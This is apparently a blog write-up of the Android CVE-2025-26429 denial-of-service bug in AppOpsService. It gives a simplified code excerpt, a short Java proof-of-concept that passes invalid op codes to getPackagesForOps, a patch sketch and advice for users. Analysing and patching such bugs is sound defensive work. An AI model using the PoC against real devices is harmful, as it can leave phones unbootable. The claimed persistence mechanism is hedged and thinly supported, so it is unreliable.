CVE-2025-26429 - Permanent Local DoS Vulnerability in AppOpsService.java – Analysis, Exploit, and Mitigation
In early 2025, a new Android vulnerability was discovered and cataloged as CVE-2025-26429. In this post, we'll dissect the bug found in AppOpsService.java's collectOps method, explain how it enables a permanent local Denial of Service (DoS), and walk through code insights and an exploitation scenario. We'll use simple language and provide original references plus a proof-of-concept.
What is CVE-2025-26429?
CVE-2025-26429 describes a bug found within the Android Open Source Project (AOSP), specifically in the AppOpsService.java file. The problem lies in the collectOps method, which lacks proper input validation. This shortcoming can be abused by any local app, allowing it to trigger a DoS on the device — possibly needing a firmware re-flash or a factory reset to recover.
Vulnerability Details
The collectOps method in AppOpsService is responsible for gathering app operations for monitoring and permissions. However, it does not sufficiently validate input (such as the uid, packageName, or op parameters). A malicious app can craft inputs that break the process, causing it to crash persistently on every restart — making the device unstable and often unbootable.
Here's a simplified look at the vulnerable code (sourced from AOSP):
    // AppOpsService.java (excerpt)
    private void collectOps(int uid, String packageName, int[] ops, List<AppOpsManager.PackageOps> res) {
        // Vulnerable section: No proper input check
        synchronized (this) {
            // Assumes ops is non-null and all fields are valid
            for (int op : ops) {
                // process op without validation
                ...
            }
            // Additional processing...
        }
    }
Exploit: How an Attacker Can Crash Android Permanently
An attacker can write a simple app that calls into the vulnerable system service, passing in invalid data (like an array with out-of-bounds operation codes, or an extremely large array), which will cause the AppOpsService to crash and keep crashing because these malformed states get stored persistently.
Example Exploit PoC (Java)
    import android.app.AppOpsManager;
    import android.content.Context;

    public class DoSExploit {
        public static void trigger(Context context) {
            try {
                AppOpsManager ops = (AppOpsManager) context.getSystemService(Context.APP_OPS_SERVICE);
                int myUid = android.os.Process.myUid();
                String myPkg = context.getPackageName();
                // Invalid op codes, could also try empty or huge arrays
                int[] badOps = new int[] { -99999, 999999, Integer.MIN_VALUE };
                // This will route through to collectOps
                ops.getPackagesForOps(badOps);
            } catch (Exception e) {
                e.printStackTrace();
            }
        }
    }
Note: Normal app sandboxing may somewhat restrict access, but the offending call chain is often exposed to installed apps, which makes it dangerous.
Why is it Permanent DoS?
Because some of the malformed states can get stored/configured in system settings or appops persistent data, the system replays these faulty values on every boot, causing constant service failures. The only recourse may be to fully wipe the device.
Real-World Scenario
After installing a malicious app, the phone starts experiencing slowdowns, then never boots past the "Android is starting" screen, as core permissions systems can't initialize.
- Google AOSP Issue Tracker: https://issuetracker.google.com/issues/324456019
- NVD Listing: https://nvd.nist.gov/vuln/detail/CVE-2025-26429
- AOSP Source (AppOpsService)
The upstream patch for this issue adds input validation:
    // Sample patch style
    for (int op : ops) {
        if (op < OP_NONE || op >= MAX_OPS) {
            Log.w(TAG, "Invalid op: " + op);
            continue;
        }
        // valid processing
    }
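As an added example (not AOSP code and not the actual patch), here is the same validation applied at the two places this post identifies: the caller-supplied array and the stored values replayed at boot. `NUM_OP` and `MAX_OPS_LEN` are assumed limits, and the class and method names are hypothetical.

```java
import java.util.ArrayList;
import java.util.List;

// Added illustration, not AOSP code. NUM_OP and MAX_OPS_LEN are assumed limits.
public class OpsInputCheck {
    static final int NUM_OP = 150;          // assumption: valid codes are 0..NUM_OP-1
    static final int MAX_OPS_LEN = NUM_OP;  // assumption: no request needs more entries

    // Boundary check for a caller-supplied array: reject the whole request
    // before any entry is processed or written to persistent state.
    static void checkCallerOps(int[] ops) {
        if (ops == null) throw new IllegalArgumentException("ops is null");
        if (ops.length > MAX_OPS_LEN)
            throw new IllegalArgumentException("too many ops: " + ops.length);
        for (int op : ops) {
            if (op < 0 || op >= NUM_OP)
                throw new IllegalArgumentException("invalid op: " + op);
        }
    }

    // Load-time check for stored values: drop bad entries instead of throwing,
    // so one malformed record cannot fail the service again on every boot.
    static List<Integer> filterStoredOps(List<Integer> stored) {
        List<Integer> ok = new ArrayList<>();
        if (stored == null) return ok;
        for (Integer op : stored) {
            if (op != null && op >= 0 && op < NUM_OP) ok.add(op);
        }
        return ok;
    }

    public static void main(String[] args) {
        // Constructed inputs; the first array holds the values from the PoC above.
        int[][] requests = { { -99999, 999999, Integer.MIN_VALUE }, new int[10_000], null, { 0, 1, 27 } };
        for (int[] req : requests) {
            try {
                checkCallerOps(req);
                System.out.println("accepted");
            } catch (IllegalArgumentException e) {
                System.out.println("rejected: " + e.getMessage());
            }
        }
        List<Integer> stored = new ArrayList<>(List.of(3, -99999, 999999, 42));
        stored.add(null);
        System.out.println("kept after load: " + filterStoredOps(stored));
    }
}
```

Rejecting at the boundary keeps malformed values out of stored state, and filtering on load means a record that was already written does not have to be cleared with a wipe.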
- System updates shipped by Android device manufacturers will fix this vulnerability.
- Until patched, be extremely careful about what apps you install, even if they need NO permissions.
Conclusion
CVE-2025-26429 is a textbook example of how small validation mistakes in critical system services can lead to devastating bugs. If you develop system or middleware code, validate everything — or risk permanent DoS, with your users paying the price.
Stay tuned for more vulnerability deep-dives, and keep your devices updated!
Looking for more details or the original report?
- Original Issue: AOSP Issue Tracker #324456019
- NVD CVE-2025-26429
Timeline
Published on: 09/04/2025 18:15:41 UTC
Last modified on: 09/05/2025 19:13:32 UTC